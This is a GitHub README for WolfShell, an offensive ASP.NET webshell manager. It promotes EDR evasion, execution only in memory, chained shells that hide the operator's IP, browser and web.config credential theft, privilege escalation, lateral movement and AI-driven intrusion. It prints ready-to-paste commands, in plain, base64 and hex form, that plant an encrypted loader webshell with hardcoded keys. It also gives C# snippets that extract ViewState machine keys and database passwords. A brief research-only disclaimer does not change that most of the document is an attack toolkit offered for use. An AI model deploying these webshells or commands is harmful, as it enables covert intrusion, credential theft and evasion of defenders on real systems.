Content
[](https://github.com/0x7556)
[](https://github.com/0x7556/wolfshell/releases)
[](https://github.com/0x7556/wolfshell/issues)
[](https://github.com/0x7556/wolfshell)
[](https://github.com/0x7556/wolfshell)
[](https://github.com/0x7556/wolfshell)
# Tool List
## 🚀 Core Advantages
* Supports AI penetration: Supports using natural language to command AI to operate WebShell to execute commands for penetration.
* Efficient and covert communication: Adopts binary stream transmission protocol to ensure high efficiency and concealment of communication.
* End-to-end secure encryption: All transmitted payloads are protected by AES encryption, and a random key is used for each communication to ensure data security.
* No痕迹 operation: Supports loading and executing code directly in memory, minimizing the risk of leaving traces on the disk and significantly improving operational concealment and security.
* Internal network cascading WebShell control: Through the existing controlled WebShell, without deploying agents or configuring port forwarding, you can connect and control WebShell in a deeper internal network environment.
* Hacking post-penetration: Loads penetration tools into memory through the controlled WebShell, without deploying agents or configuring port forwarding, to achieve convenient and efficient internal network lateral movement.
* Language features: Server (webshell) and payload are all in pure English, and only the provided WebShell variant files contain English, Japanese, and Korean.
## 🔥 Functional Features
* Shell: Supports ASPX, ASHX, ASMX, HTTP, TCP, PS1, EXE, DLL (currently only ASPX, ASHX, and memory horses are available).
* Memory horse: ASPX one-click injection memory horse, arbitrary path access, each time the shell address connection can be modified, interfering with the blue team's analysis.
* Cmd command execution: Directly executes arbitrary CMD commands on the target system. Modified whoami to prevent EDR recording and alerting.
* File management: Enumerates directory files, creates files, uploads files, executes EXE, renames, deletes, and sets file time on the target system.
* PowerShell execution: Supports executing PowerShell code and commands. Modified whoami to prevent EDR recording and alerting.
* Shellcode execution: Can directly execute native Shellcode in the target environment, and one-click上线Cobalt Strike, Metasploit.
* .NET program execution: Supports loading and executing custom .NET assemblies in memory, quickly expanding post-penetration capabilities.
* Memory-loaded scanner: Only need to develop a .NET program for a single IP, and this module can be converted into a memory-loaded C-segment scanner.
* C# code execution: Supports dynamic loading and execution of C# code.
* ValidationKey: Extracts ValidationKey, Validation, DecryptionKey, and other ViewState deserialization information.
* web.config reading: Extracts database connection information (database name, user, password), SMTP/mail server user password, etc.
* Port forwarding: Implements local port mapping to remote internal network hosts, facilitating secure access to internal network services.
* HTTP proxy: One-click memory injection Suo5 high-performance HTTP tunnel proxy tool.
* EfsPotato: Utilizes system service vulnerabilities for privilege escalation.
* BadPotato: Utilizes system service vulnerabilities for privilege escalation.
* Internal network cascading Cmd command execution: Supports cascading internal network level 2 WebShell to execute CMD commands for lateral movement.
* Internal network cascading PowerShell execution: Supports cascading internal network level 2 WebShell to execute PowerShell commands for lateral movement.
* SshCmd: SSH remote command execution tool, supports command execution, file upload and download for internal network hosts to achieve lateral movement.
* MysqlCmd: MySQL database connection tool, supports connecting to internal network MySQL, executing query, import and export, and other database operations.
* MssqlCmd: SQL Server database connection tool, supports connecting to internal network database, executing query, import and export, lateral movement, command execution, Potato privilege escalation, etc.
* SharpWeb: Browser credential capture tool, supports extracting saved Chrome, Firefox, Edge login information and credentials.
* Password reading: IISpwd wifipwd FileZillaPwd firefoxpwd XshellPwd GetPwd FirefoxHistory FirefoxCookie
* Vulnerability detection: MS17010 SMBGhost HikvisionPoc ActivemqPoc Struts2Poc WeblogicPoc CVE-2022-36537 CVE-2024-47176 CVE-2022-27925 CVE-2024-27956
* Lateral movement tools: wshell SmbExec WmiExec WmiExec2 AtExec MssqlCmd MmcExec ShellExec ShellBrowserExec
* AI evasion: Accesses AI artificial intelligence, chatting can evade WebShell.
* Ladon: Internal network penetration toolset, memory loading without file landing, including port scanning, asset detection, password auditing, vulnerability detection, vulnerability exploitation, lateral movement, etc. (Tools are integrated, currently over 10 protocols have been completed, other modules are not yet supported, and some functions may require using the original program)
* AddUser: Bypass antivirus EDR\XDR to add system users, administrators, domain users, domain administrators.
* NoPowerShell: Disables or does not have PowerShell to execute PowerShell commands, code, and files.
## Auxiliary Functions
### AI Artificial Intelligence
* AI evasion: Accesses AI artificial intelligence, chatting can evade WebShell.
### Encryption and Decryption
* Supported encryption algorithms: BASE64, HEX, ASCII, PowerShell, MD5, SHA1, SHA256, URL encoding
* Supported decryption algorithms: BASE64, HEX, ASCII, PowerShell, URL encoding
## Installation and Use
1. **Download WolfShell**
```bash
git clone https://github.com/0x7556/wolfshell.git
```
2. **Configure Environment**
- Ensure the target environment supports ASPX, ASHX, and has been correctly configured.
3. **Upload WolfShell**
- Upload WolfShell files to the target server, supporting ASPX, ASHX, and memory horses.
- WebShell script: https://github.com/0x7556/wolfshell/tree/main/shell
4. **Access WebShell**
- Connect to WebShell using the tool client, default password WolfShell, modify password can use WolfHash encryption.
## Usage Environment
- **Operating System:** Windows
- **.NET Version:** .NET Framework 4.8
## Command | Vulnerability GetShell
Possess command execution conditions, can write WolfShell through the following 4 methods
### PowerShell Write wolf.aspx
```bash
powershell -Command "Set-Content -Path 'wolf.aspx' -Value '<%@ Page Language=\"C#\" %><%if (Request.Cookies.Count != 0) { byte[] k = Encoding.Default.GetBytes(\"ca63457538b9b1e0\"); System.IO.Stream s = Request.InputStream; byte[] c = new byte[s.Length]; s.Read(c, 0, c.Length); System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(\"K\").Equals(this); }%>'"
```
### PowerShell Command Base64 Write wolf.aspx
```bash
powershell -EncodedCommand UwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAIgB3AG8AbABmAC4AYQBzAHAAeAAiACAALQBWAGEAbAB1AGUAIAAnADwAJQBAACAAUABhAGcAZQAgAEwAYQBuAGcAdQBhAGcAZQA9ACIAQwAjACIAIAAlAD4APAAlAGkAZgAgACgAUgBlAHEAdQBlAHMAdAAuAEMAbwBvAGsAaQBlAHMALgBDAG8AdQBuAHQAIAAhAD0AIAAwACkAIAB7ACAAYgB5AHQAZQBbAF0AIABrACAAPQAgAEUAbgBjAG8AZABpAG4AZwAuAEQAZQBmAGEAdQBsAHQALgBHAGUAdABCAHkAdABlAHMAKAAiAGMAYQA2ADMANAA1ADcANQAzADgAYgA5AGIAMQBlADAAIgApADsAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtACAAcwAgAD0AIABSAGUAcQB1AGUAcwB0AC4ASQBuAHAAdQB0AFMAdAByAGUAYQBtADsAIABiAHkAdABlAFsAXQAgAGMAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAcwAuAEwAZQBuAGcAdABoAF0AOwAgAHMALgBSAGUAYQBkACgAYwAsACAAMAAsACAAYwAuAEwAZQBuAGcAdABoACkAOwAgAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQAuAEwAbwBhAGQAKABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AcgAoAGsALAAgAGsAKQAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKABjACwAIAAwACwAIABjAC4ATABlAG4AZwB0AGgAKQApAC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAIgBLACIAKQAuAEUAcQB1AGEAbABzACgAdABoAGkAcwApADsAIAB9ACUAPgAnAA==
```
### Cmd Command Echo & Certutil Write wolf.aspx
```bash
echo 3c25402050616765204c616e67756167653d2243232220253e3c2569662028526571756573742e436f6f6b6965732e436f756e7420213d203029207b20627974655b5d206b203d20456e636f64696e672e44656661756c742e476574427974657328223961613337623163323561303834653022293b2053797374656d2e494f2e53747265616d2073203d20526571756573742e496e70757453747265616d3b20627974655b5d2063203d206e657720627974655b732e4c656e6774685d3b20732e5265616428632c20302c20632e4c656e677468293b2053797374656d2e5265666c656374696f6e2e417373656d626c792e4c6f6164286e65772053797374656d2e53656375726974792e43727970746f6772617068792e52696a6e6461656c4d616e6167656428292e437265617465446563727970746f72286b2c206b292e5472616e73666f726d46696e616c426c6f636b28632c20302c20632e4c656e67746829292e437265617465496e7374616e636528224b22292e457175616c732874686973293b207d253e > w.hex && certutil -f -decodehex w.hex wolf.aspx && del w.hex
```
### Cmd Command Echo Write wolf.aspx
```bash
echo ^<%@ Page Language="C#" %^> > wolf.aspx && echo ^<% if (Request.Cookies.Count != 0) { >> wolf.aspx && echo byte[] k = Encoding.Default.GetBytes("ca63457538b9b1e0"); >> wolf.aspx && echo System.IO.Stream s = Request.InputStream; >> wolf.aspx && echo byte[] c = new byte[s.Length]; >> wolf.aspx && echo s.Read(c, 0, c.Length); >> wolf.aspx && echo System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("K").Equals(this); >> wolf.aspx && echo } %^> >> wolf.aspx
```
## Function Examples
### Custom .NET Program Execution
.NET program execution: Supports loading and executing custom .NET assemblies in memory, quickly expanding post-penetration capabilities.
### AI Artificial Intelligence
Using AI to evade WolfShell WebShell service
### Cascading Internal Network Level 3 WebShell Execute Cmd Command
Through the entry point 192.168.50.106 cascading internal network 192.168.50.159 and then cascading to the next level internal network 192.168.50.69 WebShell execute commands
PS: Of course, you can also cascade to external networks, such as grabbing some servers as jumpers, and the real target is at level 3, making it difficult to track or trace back to your real IP.
### Cascading Internal Network Level 2 WebShell Execute Cmd Command
Through the entry point 192.168.50.159 cascading internal network 192.168.50.106 WebShell execute commands
### WebShell Entry Point Execute Cmd Command
### WebShell Entry Point Execute PowerShell Command/Code
* whoami code implementation non-system whoami
* Supports command execution, code execution length 9K
* Input info, ver can view operating system version, bit number, .NET version, PowerShell version information
* Input whoami, username can automatically convert to corresponding powershell code to view user information
* Base64 encryption code execution Example base64:ZWNobyBXb2xmU2hlbGw=
```csharp
PS C:\Users\admin>whoami
whoami: IIS APPPOOL\DefaultAppPool
Username: WIN-021V7TK43N5$
PS C:\Users\admin>info
Operating System Version: Microsoft Windows Server 2019 Datacenter 64 bit
Version Number: 10.0.17763
PowerShell Version:
5.1.17763.1
.NET Detailed Versions:
PSChildName Version Release
----------- ------- -------
Client 4.7.03190 461814
PS C:\Users\admin>base64:ZWNobyBXb2xmU2hlbGw=
WolfShell
PS C:\Users\admin>Write-Host "Current User:`n$env:USERNAME"
Current User:
WIN-021V7TK43N5$
```
### File Management
### C# Code Execution
#### Obtaining ValidationKey Example Code
* ValidationKey: Extracts ViewState deserialization information such as ValidationKey, Validation, and DecryptionKey.
```csharp
using System;
using System.Reflection;
using System.Web.Configuration;
public class Eval
{
public string eval(Object obj)
{
var sy = Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
var gac = mkt.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic);
var cg = (MachineKeySection)gac.Invoke(null, new object[0]);
return "ValidationKey: " + cg.ValidationKey + " | " + "Validation: " + cg.Validation + " | " + "DecryptionKey: " + cg.DecryptionKey + " | " + "Decryption: " + cg.Decryption + " | " + "CompatibilityMode: " + cg.CompatibilityMode;
}
}
```
#### Scanning C-segment alive hosts Example Code
```csharp
using System;
using System.Net;
using System.Net.NetworkInformation;
using System.Text;
using System.Threading.Tasks;
public class Eval
{
public string eval(Object obj)
{
StringBuilder iplist = new StringBuilder();
string baseIP = "192.168.1.";
PingOptions options = new PingOptions();
options.DontFragment = true;
var tasks = new Task[254];
for (int i = 1; i < 255; i++)
{
int ipSuffix = i;
tasks[i - 1] = Task.Run(() =>
{
using (Ping myPing = new Ping())
{
PingReply reply = myPing.Send(baseIP + ipSuffix, 120);
if (reply.Status == IPStatus.Success)
{
lock (iplist)
{
iplist.AppendLine("Alive IP: " + reply.Address.ToString());
}
}
}
});
}
Task.WaitAll(tasks);
return iplist.ToString();
}
}
```
#### CMD Command Execution Example Code
```csharp
using System;
using System.Diagnostics;
public class Eval
{
public string eval(Object obj)
{
try
{
Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = "/c whoami";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
string result = process.StandardOutput.ReadToEnd();
process.WaitForExit();
return result;
}
catch (Exception ex)
{
return "Error occurred: " + ex.Message;
}
}
}
```
#### Obtaining web.config Password Example Code
* web.config reading: Extracts database connection information (database name, user, password), SMTP/mail server user password, etc.
```csharp
using System;
using System.Configuration;
using System.Text;
public class Eval
{
public string eval(Object obj)
{
try
{
var connectionStrings = ConfigurationManager.ConnectionStrings;
var appSettings = ConfigurationManager.AppSettings;
var result = new StringBuilder();
foreach (ConnectionStringSettings connectionString in connectionStrings)
{
result.AppendLine("Connection string name: " + connectionString.Name);
result.AppendLine("Connection string value: " + connectionString.ConnectionString);
result.AppendLine();
}
result.AppendLine();
foreach (string key in appSettings.AllKeys)
{
result.AppendLine("Key: " + key + ", Value: " + appSettings[key]);
}
return result.ToString();
}
catch (Exception ex)
{
return "Error occurred: " + ex.Message;
}
}
}
```
### Encryption and Decryption Algorithms
Supports encryption algorithms: BASE64, HEX, ASCII, PowerShell, MD5, SHA1, SHA256, URL encoding
Supports decryption algorithms: BASE64, HEX, ASCII, PowerShell, URL encoding
#### WolfHash Password
#### ASCII Code Encryption
#### BASE64 Decryption
#### HEX Hexadecimal Decryption
### Potato Privilege Escalation Example
#### efspotato Privilege Escalation
#### badpotato Privilege Escalation
### Internal Network Scanning Example
### Port Forwarding Example
### HTTP Proxy Example
## Hacking Post-Exploitation
### SSH Remote Command Execution Example
```bash
Usage:
sshcmd 192.168.50.128 22 root toor id
sshcmd 192.168.50.128 22 root toor download /tmp/down.rar c:\down.rar
sshcmd 192.168.50.128 22 root toor upload c:\upload.rar /tmp/upload.rar
Keybord
sshcmd 192.168.50.128 22 root toor download2 /tmp/down.rar c:\down.rar
sshcmd 192.168.50.128 22 root toor upload2 c:\upload.rar /tmp/upload.rar
```
### MySQL Database Connection Example
```bash
mysqlcmd host port user pass dbname sqlstr
mysqlcmd host port user pass dbname sqlb64
Demo:
mysqlcmd 192.168.50.139 3306 root WolfShell mysql info
mysqlcmd 192.168.50.139 3306 root WolfShell mysql ""SELECT VERSION(); ""
mysqlcmd 192.168.50.139 3306 root WolfShell mysql ""SELECT 3+5 ""
mysqlcmd 192.168.50.139 3306 root WolfShell mysql c2VsZWN0IDMrNQ==";
```
### Reading Browser Passwords Example
* SharpWeb: A browser credential extraction tool that supports extracting saved Chrome, Firefox, Edge login information and credentials.
```bash
Usage:
SharWeb arg0 [arg1 arg2 ...]
Arguments:
all - Retrieve all Chrome, FireFox and IE/Edge credentials.
full - The same as 'all'
chrome - Fetch saved Chrome logins. e.g. -d Directory
firefox - Fetch saved FireFox logins. e.g. -p masterkey -d Directory
edge - Fetch saved Internet Explorer/Microsoft Edge logins.
Demo:
SharWeb all
SharWeb chrome
SharWeb chrome -d C:\Output
SharWeb firefox -p mymasterkey -d C:\Output
SharWeb edge
=======================================================================
```
### Ladon Internal Network Penetration Tool Example
```bash
Usage:
Ladon whoami
Ladon 192.168.50.159/24 ICMP ICMP alive host detection
Ladon 192.168.50.159/24 PortScan Open port service scanning
Ladon 192.168.50.159/24 WebScan Website title, middleware
Ladon 192.168.50.159/24 SmbInfo SMB alive host detection, NTLM system information
Ladon 192.168.50.159/24 NbtInfo NBT alive host detection, NTLM system information
Ladon 192.168.50.159/24 WmiInfo WMI alive host detection, NTLM system information
Ladon 192.168.50.159/24 LdapInfo LDAP alive host detection, NTLM system information
Ladon 192.168.50.159/24 RdpInfo RDP alive host detection, NTLM system information
Ladon 192.168.50.159/24 SmtpInfo SMTP alive host detection, NTLM system information
Ladon 192.168.50.159/24 HttpInfo HTTP alive host detection, NTLM system information
Ladon 192.168.50.159/24 WinrmInfo Winrm alive host detection, NTLM system information
Ladon 192.168.50.159/24 MssqlInfo SQL database host detection, NTLM system information
Ladon 192.168.50.159/24 FtpInfo FTP alive host detection
Ladon 192.168.50.159/24 T3Info Weblogic protocol detection
Ladon 192.168.50.159/24 CiscoInfo Cisco router detection
Ladon 192.168.50.159/24 SnmpInfo SNMP device detection, such as routers, switches, etc.
Ladon 192.168.50.159/24 OxidInfo Windows multi-network card host detection
Ladon 192.168.50.159/24 EthInfo Windows multi-network card host detection
Ladon http://0x7556.org WPinfo WordPress version, plugin detection, vulnerability
Ladon 192.168.50.159/24 DnsInfo DNS alive host detection, domain recognition
```
#### SMB Protocol NTLM Information OS Operating System Identification
#### WebScan Website Title, Middleware Scanning
### Port Scanning Example
```bash
PortScan 192.168.50.159
PortScan 192.168.50.159 80,22,135,445
```
## MS17010 Vulnerability Detection
## SQL Server Lateral Movement Database Privilege Escalation
## Xshell Password Reading
## webkey Password Reading
Parsing web.config to obtain ValidationKey (ViewState deserialization Exchange, SharePoint backdoor)
## CVE-2025-55182 Next.js Rce Vulnerability Exploitation
[+]CVE-2025-55182 CVE-2025-55182 Next.js Rce vulnerability exploitation
[+]NextJSexp CVE-2025-55182 Next.js Rce vulnerability exploitation
## Memory Loading Internal Network Scanner
### Memory Loading Scanner
* Only develop a .NET program for a single IP, and use this module to transform it into a memory-loaded C-segment scanner.
* If you only need to implement detection, vulnerability exploitation, etc. for one IP, note that the class and method must be public.
#### Custom Tool Original Usage
```bash
F:\py>urltitle.exe 192.168.50.1
URL: http://192.168.50.1/ | Status: 200 | Banner: httpd/2.0 | Title: No Title
```
#### Remote Memory Loading Becomes Internal Network C-Segment Scanner
Usage:
1. Drag the target EXE to the "ExePath" file path input box.
2. Fill in the C-segment input box with the network segment to be scanned (e.g., 192.168.1.0/24).
3. Click the "Scan" button to start scanning. The scanning behavior and results are determined by the loaded EXE functionality.
Explanation:
- The loader first uses ICMP (ping) to probe the target for liveness, and only alive hosts will be loaded and executed with custom EXE.
- If the target network disables ICMP response, please uncheck the "Prior probe/ICMP" option to skip the detection step.
#### Memory Loading Scanner Built-in MS17010 Vulnerability Detection
## Disclaimer
- When using WolfShell, please follow relevant laws and regulations and ensure that you are testing and using it in an authorized environment.
- This tool is only for educational and research purposes. Any abuse will be the responsibility of the user.
## Feedback
Welcome any form of contribution! Please submit issues, suggestions, or pull requests.
## License
This project uses the MIT license. For details, see the [LICENSE](LICENSE) file.
## Resource Links
Integrated or to-be-integrated tools, using memory loading, some tools have not solved compatibility issues, such as (SweetPotato\GodPotato, may need to upload the target to execute in cmd)
* Ladon (internal network penetration framework): https://github.com/k8gege/Ladon (very rich functionality, under research)
* gpt4free (AI free API): https://github.com/xtekky/gpt4free
* SharpWeb (browser password reading): https://github.com/djhohnstein/SharpWeb
* suo5 proxy (HTTP tunnel proxy): https://github.com/zema1/suo5
* BadPotato (privilege escalation tool): https://github.com/BeichenDream/BadPotato
* EfsPotato (privilege escalation tool): https://github.com/zcgonvh/EfsPotato
* CVE-2025-59287 vulnerability .net deserialization memory forward horse: https://github.com/0x7556/CVE-2025-59287
## Follow
* Welcome to follow the public account and Github. Your follow, like, and feedback will be the driving force for software updates!
